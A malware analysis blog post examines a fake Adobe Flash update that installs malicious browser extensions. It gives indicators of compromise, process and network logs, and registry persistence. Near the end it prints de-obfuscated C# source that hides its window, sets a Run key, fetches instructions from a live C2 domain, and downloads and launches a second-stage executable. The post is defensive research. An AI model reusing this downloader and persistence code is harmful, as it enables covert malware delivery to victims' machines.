A week ago security researcher Dancho Danchev published an excellent post – Fake Adobe Flash Player Serving Campaign Utilizes Google Hosting/Redirection Infrastructure, Spreads Across Facebook

I was curious to learn more about this malware, so I ran the rogue binary (Adobe Flash Update titled FlashGuncelle.exe) through our Vinsula Execution Engine (VEE) to analyze its behavior, and I also delved into specific facets of its source code.

Attack Overview

The diagram below highlights the key elements of the attack.  In short, this malware delivers and installs malicious plugins for Chrome and Firefox.

 

Diagram

FlashGuncelle.exe

These are the hashes of the main executable FlashGuncelle.exe that camouflages itself as an Adobe Flash update:

  • MD5: 30118bec581f80de46445aef79e6cf10
  • SHA256: adec1707efaa1496691d5d4b12daaadff893b0f0ad68b33699e5dd7dd6f8eb58

The name of the executable, FlashGuncelle.exe didn’t sound English, so I checked in Google and according to Google Translate, “Flash Guncelleme” translated from Turkish means “Flash update”.  Indeed, as discussed below, there are several indicators suggesting that this malware was created by a Turkish-speaking author.

Detection rate for this malware: MD5: 30118bec581f80de46445aef79e6cf10 was detected on VirusTotal.com by 34 out of 47 antivirus scanners as Trojan-Ransom.Win32.Blocker.dbud.

The description of the file attributes of this malware in Windows Explorer appear as:

 

File Attributes

 

Behavioral Analysis

Our first step was to run the fake Adobe Flash Update through our Vinsula Execution Engine to find out just what it does. Based on the results generated by Vinsula, we can confirm all of the findings published by Dancho Danchev, and can share some additional details related to the behavior and the origins of this malware.

After launching the main malware executable FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10) the following screen pops up. The text in the progress bar—again translated from Turkish—reads “Please wait… “.

 

FlashGuncelle Progress Bar

Behind the scenes, FlashGuncelle.exe connects to a C2 server on port 80. The domain name of the C2 server is eklentidunyasi[dot]com and its IP address as shows up in the log is 176.227.218.98. The malware downloads from the C2 server an additional executable titled  YokExe.exe—which is larger than the downloader FlashGuncelle.exe—and it embeds (as a resource) several other files discussed later.

FlashGuncelle.exe also copies itself to \ProgramData\Sextension folder under a different name – FlashUpdate.exe.

Once the additional malware binary YokExe.exe is downloaded, FlashGuncelle.exe launches it.

YokExe.exe embeds several additional executables that will play key roles in the infection process.  After YokExe.exe starts up, it drops following files to \ProgramData\Sextension folder.

  • Flash_Plugin.exe
  • Updater.exe
  • Ionic.Zip.dll
  • System.Data.SQLite.dll

A log file with name “log_DDDD.txt” is also created in the same folder. The DDDD in the name of the file is a number, which is the value returned by GetCurrentTicks() API.  This same log file is shared by YokExe.exe and  Flash_Plugin.exe and provides some debugging information as well as additional clues about the origin of the malware.  More on this will be discussed in the next sections.

Upon completion, the malware displays following screen. The text shown on the screen “Güncelleme Tamamlandi” is in Turkish and translates to “Update Completed”.

 

Update Completed

One of the tasks that YokExe.exe performs after extracting the embedded resource binaries is to launch Flash_Plugin.exe, which is in turn responsible for downloading, installing, and loading the extensions for Chrome and Firefox to ensure all user actions will be captured.

Flash_Plugin.exe connects to host agentofex.com (IP 37.220.17.43, 176.227.218.99) from where it downloads a ZIP file with all browser extensions.

We tested the malware in Chrome, although as shown in the source code below, it is clear that this malware specifically targets Chrome and Firefox.

The process cascade view below as reported by our Vinsula Execution Engine allows us to visually present the parent/child relationship between the different processes related to the execution for this specific malware.

 

+ FlashGuncelle.exe [Process Id: 2484]
	+ YokExe.exe [Process Id: 3508] 
		+ Flash_Plugin.exe [Process Id: 2776] 
			+ chrome.exe [Process Id: 200] 
				+ chrome.exe [Process Id: 612] 
				+ chrome.exe [Process Id: 1804] 
				+ chrome.exe [Process Id: 2404] 
				+ chrome.exe [Process Id: 2476] 
				+ chrome.exe [Process Id: 3140] 
				+ chrome.exe [Process Id: 3436]

As I will reveal in segments from the disassembled source code below, the process name YokExe.exe is hard-coded.  “Yok” is actually one of the few Turkish words I know:  It translates to “No” in English, which gives the process the rather strange name of “NoExe.exe.”

A more detailed view, including the command line, would also be helpful to find out what different processes are accepting as command-line parameters and what specifically Chrome is instructed to do by the malware process Flash_Plugin.exe.  Below is a longer excerpt from the Vinsula Execution Engine log, in which we can clearly see that Flush_Plugin.exe launches Chrome.exe with the command line “C:\Program Files\Google\Chrome\Application\chrome.exe” –load-extension=”C:\ProgramData\SExtension\SExtension\ext”. This forces Chrome to install and load the malicious plugin located in “C:\ProgramData\SExtension\SExtension\ext”.

+ FlashGuncelle.exe [Process Id: 2484] 
  Command Line: "c:\temp\f7d690f9c0c14c74a56ceb8494b49185\FlashGuncelle.exe" 
	+ YokExe.exe [Process Id: 3508] 
	  Command Line: "C:\ProgramData\YokExe.exe" 
		+ Flash_Plugin.exe [Process Id: 2776] 
		  Command Line: "C:\ProgramData\SExtension\Flash_Plugin.exe" 
			+ chrome.exe [Process Id: 200] 
			  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\ProgramData\SExtension\SExtension\ext"
				+ chrome.exe [Process Id: 612] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --extension-process --renderer-print-preview --disable-html-notifications --channel="200.3.904454566\1167562180" /prefetch:673131151
				+ chrome.exe [Process Id: 1804] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --renderer-print-preview --disable-html-notifications --channel="200.4.1864533236\761296897" /prefetch:673131151
				+ chrome.exe [Process Id: 2404] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --extension-process --renderer-print-preview --disable-html-notifications --channel="200.5.715101759\226981406" /prefetch:673131151
				+ chrome.exe [Process Id: 2476] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --channel="200.0.960705660\407094172" --supports-dual-gpus=false --gpu-driver-bug-workarounds=0,3,12,22 --gpu-vendor-id=0x15ad --gpu-device-id=0x0405 --gpu-driver-vendor="VMware, Inc." --gpu-driver-version=7.14.1.1211 --ignored=" --type=renderer " /prefetch:822062411
				+ chrome.exe [Process Id: 3140] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --renderer-print-preview --instant-process --disable-html-notifications --channel="200.1.549728062\849114718" /prefetch:673131151
				+ chrome.exe [Process Id: 3436] 
				  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-GB --force-fieldtrials="AutocompleteDynamicTrial_2/DefaultControl_R2_Stable/BrowserPreReadExperiment/100-pct-default/CookieRetentionPriorityStudy/ExperimentOn/DeferBackgroundExtensionCreation/RateLimited/ForceCompositingMode/thread/InstantExtended/Group1 pct:25 stable:r4 use_remote_ntp_on_startup:1 espv:210 suppress_on_srp:1/Prerender/PrerenderEnabled/PrerenderLocalPredictorSpec/LocalPredictor=Disabled/ShowAppLauncherPromo/ShowPromoUntilDismissed/Test0PercentDefault/group_01/UMA-Dynamic-Binary-Uniformity-Trial/default/UMA-Dynamic-Uniformity-Trial/Group6/UMA-New-Install-Uniformity-Trial/Control/UMA-Session-Randomized-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-1-Percent/group_78/UMA-Uniformity-Trial-10-Percent/group_09/UMA-Uniformity-Trial-100-Percent/group_01/UMA-Uniformity-Trial-20-Percent/default/UMA-Uniformity-Trial-5-Percent/group_19/UMA-Uniformity-Trial-50-Percent/default/" --enable-threaded-compositing --renderer-print-preview --signin-process --disable-html-notifications --channel="200.2.2088270437\1399557482" /prefetch:673131151

In our test with Chrome, the malware installed a malicious plugin for Chrome using the files dropped by one of the malware binaries, Flash_Plugin.exe. Going through the disassembled source code, it is evident that a similar mechanism is used for installing and loading the malware plugin for Firefox. Following screenshot displays the details about the malicious Chrome plugin.

Chrome Plugin

Ironically, the plugin name as appears in the screenshot above, “Güvenlik Duvarı” is also in Turkish and translates to “Firewall.”

In the following screen, we can see the permissions the malicious Chrome plugin is granted.

 

Chrome Plugin Permissions

After the malware installation completes and the malicious plugin is loaded, following screen pops up.

AgentofEx

The following list is a short segment from the Vinsula report that captures only entries related IP addresses/ports this malware and infected processes (in this case Chrome) talks to.

+ FlashGuncelle.exe [Process Id: 2484] 
	 =>  TCP IPv4 UNK 255.254.253.252:1118 <==> 176.227.218.98:80
	 =>  TCP IPv4 UNK 255.254.253.252:1119 <==> 176.227.218.98:80
	 =>  TCP IPv4 send 255.254.253.252:1118  ==> 176.227.218.98:80
	 =>  TCP IPv4 recv 255.254.253.252:1118 <==  176.227.218.98:80
	 =>  TCP IPv4 send 255.254.253.252:1119  ==> 176.227.218.98:80
	 =>  TCP IPv4 recv 255.254.253.252:1119 <==  176.227.218.98:80
	 =>  TCP IPv4 UNK 255.254.253.252:1120 <==> 46.163.100.240:80
	 =>  TCP IPv4 send 255.254.253.252:1120  ==> 46.163.100.240:80
	 =>  TCP IPv4 recv 255.254.253.252:1120 <==  46.163.100.240:80
+ Flash_Plugin.exe [Process Id: 2776] [Parent Id: 3508] 
  Command Line: "C:\ProgramData\SExtension\Flash_Plugin.exe" 
	 =>  TCP IPv4 UNK 255.254.253.252:1121 <==> 37.220.17.43:80
	 =>  TCP IPv4 send 255.254.253.252:1121  ==> 37.220.17.43:80
	 =>  TCP IPv4 recv 255.254.253.252:1121 <==  37.220.17.43:80
+ chrome.exe [Process Id: 200] [Parent Id: 2776] 
  Command Line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\ProgramData\SExtension\SExtension\ext"
	 =>  TCP IPv4 UNK 255.254.253.252:1122 <==> 74.125.136.94:443
	 =>  TCP IPv4 UNK 255.254.253.252:1123 <==> 74.125.136.94:443
	 =>  TCP IPv4 UNK 255.254.253.252:1124 <==> 74.125.136.84:443
	 =>  TCP IPv4 UNK 255.254.253.252:1125 <==> 74.125.136.84:443
	 =>  TCP IPv4 UNK 255.254.253.252:1126 <==> 74.125.136.147:443
	 =>  TCP IPv4 UNK 255.254.253.252:1127 <==> 74.125.136.95:443
	 =>  TCP IPv4 UNK 255.254.253.252:1128 <==> 74.125.136.139:443
	 =>  TCP IPv4 UNK 255.254.253.252:1129 <==> 74.125.136.147:443
	 =>  TCP IPv4 send 255.254.253.252:1122  ==> 74.125.136.94:443
	 =>  TCP IPv4 recv 255.254.253.252:1122 <==  74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1123  ==> 74.125.136.94:443
	 =>  TCP IPv4 recv 255.254.253.252:1123 <==  74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1124  ==> 74.125.136.84:443
	 =>  TCP IPv4 recv 255.254.253.252:1124 <==  74.125.136.84:443
	 =>  TCP IPv4 send 255.254.253.252:1125  ==> 74.125.136.84:443
	 =>  TCP IPv4 recv 255.254.253.252:1125 <==  74.125.136.84:443
	 =>  TCP IPv4 send 255.254.253.252:1126  ==> 74.125.136.147:443
	 =>  TCP IPv4 recv 255.254.253.252:1126 <==  74.125.136.147:443
	 =>  TCP IPv4 send 255.254.253.252:1127  ==> 74.125.136.95:443
	 =>  TCP IPv4 recv 255.254.253.252:1127 <==  74.125.136.95:443
	 =>  TCP IPv4 send 255.254.253.252:1128  ==> 74.125.136.139:443
	 =>  TCP IPv4 recv 255.254.253.252:1128 <==  74.125.136.139:443
	 =>  TCP IPv4 UNK 255.254.253.252:1130 <==> 74.125.136.120:443
	 =>  TCP IPv4 send 255.254.253.252:1130  ==> 74.125.136.120:443
	 =>  TCP IPv4 recv 255.254.253.252:1130 <==  74.125.136.120:443
	 =>  TCP IPv4 UNK 255.254.253.252:1131 <==> 74.125.136.84:443
	 =>  TCP IPv4 send 255.254.253.252:1131  ==> 74.125.136.84:443
	 =>  TCP IPv4 recv 255.254.253.252:1131 <==  74.125.136.84:443
	 =>  TCP IPv4 UNK 255.254.253.252:1132 <==> 74.125.136.101:443
	 =>  TCP IPv4 send 255.254.253.252:1132  ==> 74.125.136.101:443
	 =>  TCP IPv4 recv 255.254.253.252:1132 <==  74.125.136.101:443
	 =>  TCP IPv4 UNK 255.254.253.252:1133 <==> 176.31.2.150:443
	 =>  TCP IPv4 UNK 255.254.253.252:1134 <==> 176.31.2.150:443
	 =>  TCP IPv4 UNK 255.254.253.252:1135 <==> 74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1133  ==> 176.31.2.150:443
	 =>  TCP IPv4 recv 255.254.253.252:1133 <==  176.31.2.150:443
	 =>  TCP IPv4 send 255.254.253.252:1134  ==> 176.31.2.150:443
	 =>  TCP IPv4 recv 255.254.253.252:1134 <==  176.31.2.150:443
	 =>  TCP IPv4 UNK 255.254.253.252:1136 <==> 74.125.136.94:443
	 =>  TCP IPv4 send 255.254.253.252:1135  ==> 74.125.136.94:443
	 =>  TCP IPv4 recv 255.254.253.252:1135 <==  74.125.136.94:443
	 =>  TCP IPv4 UNK 255.254.253.252:1137 <==> 37.220.17.43:80
	 =>  TCP IPv4 UNK 255.254.253.252:1138 <==> 37.220.17.43:80
	 =>  TCP IPv4 UNK 255.254.253.252:1139 <==> 74.125.136.100:80
	 =>  TCP IPv4 send 255.254.253.252:1137  ==> 37.220.17.43:80
	 =>  TCP IPv4 recv 255.254.253.252:1137 <==  37.220.17.43:80
	 =>  TCP IPv4 UNK 255.254.253.252:1140 <==> 95.85.40.246:80
	 =>  TCP IPv4 send 255.254.253.252:1138  ==> 37.220.17.43:80
	 =>  TCP IPv4 recv 255.254.253.252:1138 <==  37.220.17.43:80
	 =>  TCP IPv4 send 255.254.253.252:1139  ==> 74.125.136.100:80
	 =>  TCP IPv4 recv 255.254.253.252:1139 <==  74.125.136.100:80
	 =>  TCP IPv4 send 255.254.253.252:1140  ==> 95.85.40.246:80
	 =>  TCP IPv4 recv 255.254.253.252:1140 <==  95.85.40.246:80

Here is a short list of IP addresses that look suspicious as they are involved in the malware execution.

176.227.218.98
176.227.218.99
46.163.100.240
37.220.17.43
95.85.40.246
74.125.136.84
74.125.136.94 
74.125.136.95
74.125.136.101
74.125.136.120
74.125.136.139
74.125.136.147
176.31.2.150

Following list is information from one of the Whois services http://whois.net that maps the two main domain names to the IP addresses above

eklentidunyasi.com
Non-authoritative answer:
Name:	eklentidunyasi.com
Address: 176.227.218.98 

agentofex.com
Non-authoritative answer:
Name:	agentofex.com
Address: 37.220.17.43
Name:	agentofex.com
Address: 176.227.218.99

Here is the geographical location reports for the 4 main malware IP addresses. Notice that three of the IP addresses are located in UK and one in Germany.

176.227.218.98
176.227.218.99
46.163.100.240
37.220.17.43

176.227.218.98

176.227.218.99

46.163.100.240

37.220.17.43

Another aspect of our report that deserves attention is the details around what additional files the malware drops and works with. I tried to shorten the list, so only the entries that are relevant to the malware execution are shown.

 + FlashGuncelle.exe [Process Id: 2484] 
	 Event:Create File[C:\ProgramData\FlashUpdate.exe]
	 Event:Write File[C:\ProgramData\FlashUpdate.exe]
	 Event:Create File[C:\ProgramData\YokExe.exe]
	 Event:Write File[C:\ProgramData\YokExe.exe]
	 + YokExe.exe [Process Id: 3508]
		 Event:Create File[C:\ProgramData\SExtension\Flash_Plugin.exe]
		 Event:Write File[C:\ProgramData\SExtension\Flash_Plugin.exe]
		 Event:Create File[C:\ProgramData\SExtension\Ionic.Zip.dll]
		 Event:Write File[C:\ProgramData\SExtension\Ionic.Zip.dll]
		 Event:Create File[C:\ProgramData\SExtension\System.Data.SQLite.dll]
		 Event:Write File[C:\ProgramData\SExtension\System.Data.SQLite.dll]
		 Event:Create File[C:\ProgramData\SExtension\Updater.exe]
		 Event:Write File[C:\ProgramData\SExtension\Updater.exe]
		 + Flash_Plugin.exe [Process Id: 2776] 
			 Event:Delete File[C:\ProgramData\SExtension\log_635249660322534445.txt]
			 Event:Open File[C:\ProgramData\SExtension\log_635249660322534445.txt]
			 Event:Create File[C:\ProgramData\SExtension\log_635249660382077851.txt]
			 Event:Write File[C:\ProgramData\SExtension\log_635249660382077851.txt]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\buflash.xpi]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\buflash.xpi]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\bune10.zip]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\bune10.zip]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\extension.js]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\extension.js]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\extension.js.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\extension.js]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\go.js]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\ext\go.js.tmp]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\index.html]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\ext\index.html.tmp]
			 Event: File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Create File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]
			 Event:NetworkQueryOpen File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]
			 Event:Open File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]
			 Event:Rename File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp] New File[\Device\HarddiskVolume1\ProgramData\SExtension\SExtension\ext\manifest.json]
			 Event:Write File[C:\ProgramData\SExtension\SExtension\ext\manifest.json.tmp]

Now let’s summarize the files that are being dropped. All hashes are located at the end of the post.

\ProgramData\FlashUpdate.exe
\ProgramData\YokExe.exe
\ProgramData\SExtension\Flash_Plugin.exe
\ProgramData\SExtension\Ionic.Zip.dll
\ProgramData\SExtension\System.Data.SQLite.dll
\ProgramData\SExtension\Updater.exe
\ProgramData\SExtension\SExtension\buflash.xpi
\ProgramData\SExtension\SExtension\bune10.zip
\ProgramData\SExtension\SExtension\ext\background.js
\ProgramData\SExtension\SExtension\ext\extension.js
\ProgramData\SExtension\SExtension\ext\go.js
\ProgramData\SExtension\SExtension\ext\index.html
\ProgramData\SExtension\SExtension\ext\manifest.json

The rogue Adobe Update malware persists itself by registering itself in the registry startup location, as can be seen below:

+ FlashGuncelle.exe [Process Id: 2484]
  Action:NtSetValueKey Key:HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
         Name:FlashGuncelle 
         Value:"C:\ProgramData\FlashUpdate.exe"
+ Flash_Plugin.exe [Process Id: 2776]
  Action:NtSetValueKey Key:HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
         Name:Extension 
         Value:"C:\ProgramData\SExtension\Flash_Plugin.exe"

Following screenshot captures the registry changes in registry editor.

Registry

Static analysis

Next, I decided to find out more about the executable by opening the main malware binary FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10) in PEview.  It was obvious that the malware was written in .NET, very likely in C#. It is compiled with Visual Studio .NET with a compiler setting “Any CPU” compilation target which makes the malware able to run as a native 32-bit or 64-bit process without being recompiled on both 32-bit and 64-bit platforms. In other words, “Any CPU” tells the JIT (Just In Time) .NET loader to compile the MSIL .NET code to the platform it is being loaded (i.e., 32-bit or 64-bit).

The number of recent malware .NET binaries in the wild seems to be increasing. Surely writing malware in C# would require significantly less effort than writing the same code in C++ or an assembly language.

The only imported function is _CorExeMain which is typical for .NET executables. The PE of the binary image is shown below:

PEview

 

Next step was to disassemble the main binary FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10) and all other binary files that also turned out to be written in .NET (assuming C#). What I found out is that all binaries were obfuscated to make the reverse engineering process harder. Luckily, I’ve managed to figure out what obfuscation was used for these binaries and de-obfuscate all executables. To discourage other bad guys from reusing the concept and the code of this malware, we’re not going to publicly disclose the obfuscation method that the malware uses, but we can share this information with well-known AV/Security Researchers and Law Enforcement.

Reversing the binaries and analysis of the C# code

Now that we know that this is malware and have revealed what it does, I thought it would make sense to disassemble the code, so we can have a clear picture about how the malware was implemented.

All binaries (i.e., .NET assemblies) use the same obfuscation algorithm except the Updater.exe image which the malware author decided not to obfuscate at all.

I’ve also renamed some of the class names after the de-obfuscation to make more sense and make the code more readable.

FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10)

This is a Windows Forms .NET application that implements the core downloader logic and a few other tasks.

In the main form of this application, within the FormLoad event, the malware first registers itself as a run-at-startup application. It looks like the malware author either didn’t have much experience with C# or had recently converted from C++ as using the @ character in front on the string literal causes the escape sequence to be ignored, so the string passed to OpenSubKey, “@”SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run”.   It is also strange that the buggy call to OpenSubKey is followed by a correct one.

In the same FormLoad event, the application checks if it is running as the main malware file FlashGuncelle.exe or as its copy FlashUpdate.exe.  If it is running as its copy, it also hides the process from Windows task bar and makes the form hidden, so the user wouldn’t know the malware is running. This is intended to work after the main executable FlashGuncelle.exe terminates or the user has rebooted the machine.

using System.Reflection;

namespace WindowsFormsApplication5
{
    public sealed class Form1 : Form
    {
        public static string fileVersion = FileVersionInfo.GetVersionInfo(Assembly.GetExecutingAssembly().Location).FileVersion;
        public static string checkUrl = ("http://eklentidunyasi.com/extFiles/control" + fileVersion + ".txt");
        public static string copyName = "FlashUpdate";
        public static string exeName = "YokExe.exe";
        public static string extensionDirectory = (programDirectory + @"\SExtension");
        public static string programDirectory = (Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData));
        public static string projectName = "FlashGuncelle";
        public static string sourcePath = Application.ExecutablePath;
        public static string targetPath = Path.Combine(programDirectory, copyName + ".exe");

        private void Form1_Load_1(object sender, EventArgs e)
        {
            if ((Process.GetCurrentProcess().ProcessName != copyName) && !System.IO.File.Exists(targetPath))
            {
                this.SaveLibrary(projectName + ".exe");
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)
                                    .SetValue(projectName, "\"" + targetPath + "\"");
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true)
                                     .SetValue(projectName, "\"" + targetPath + "\"");
            }
            if (Process.GetCurrentProcess().ProcessName == copyName)
            {
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)
                                    .SetValue(projectName, "\"" + targetPath + "\"");
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true)
                                    .SetValue(projectName, "\"" + targetPath + "\"");
                if (Directory.Exists(extensionDirectory))
                {
                    Process.Start(programDirectory + "\\" + exeName);
                    this.waitingStatus = true;
                }
                else
                {
                    this.waitingStatus = false;
                }
                base.Visible = false;
                base.Opacity = 0.0;
                base.ShowInTaskbar = false;
            }
            if (!this.waitingStatus)
            {
                this.label1.Text = "Luctfen bekleyin, gucncelleme yapılıyor!";
                WebClient client = new WebClient();
                client.Headers["User-Agent"] = "WebClient For Extensions";
                string uriString = client.DownloadString(new Uri(checkUrl));
                if (uriString.IndexOf(".exe") != -1)
                {
                    client.DownloadFileCompleted += new AsyncCompletedEventHandler(this.Completed);
                    client.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.ProgressChanged);
                    client.Headers["User-Agent"] = "WebClient For Extensions";
                    client.DownloadFileAsync(new Uri(uriString), programDirectory + "\\" + exeName);
                }
                else
                {
                    MessageBox.Show("PROBLEM!");
                }
            }
        }
    }
}

As shown in the snippet above, the malware also sends a get request to eklentidunyasi[dot]com using following URL “hxxp://eklentidunyasi.com/extFiles/control” + fileVersion + “.txt”, where the fileVersion string is the FlashGuncelle.exe/FlashUpdate.exe assembly version. That allows the attacker to return back a response to the malware depending on the version sending the initial GET request. If we look at the AssemblyInfo.cs file of the same project we can see what version we’ve been testing with.

Also, the “User-Agent” for the HTTP request is set to “WebClient For Extensions”. It is very likely that on the server side, the user agent is checked to have some sort of verification that the request is actually coming from the malware client.

using System.Configuration.Assemblies;

[assembly: System.Reflection.AssemblyFileVersion("8")]
[assembly: System.Reflection.AssemblyConfiguration("")]
[assembly: System.Reflection.AssemblyTitle("Adobe")]
[assembly: System.Reflection.AssemblyTrademark("Adobe")]
[assembly: System.Reflection.AssemblyProduct("Adobe")]
[assembly: System.Reflection.AssemblyCompany("Adobe")]
[assembly: System.Reflection.AssemblyCopyright("Adobe")]

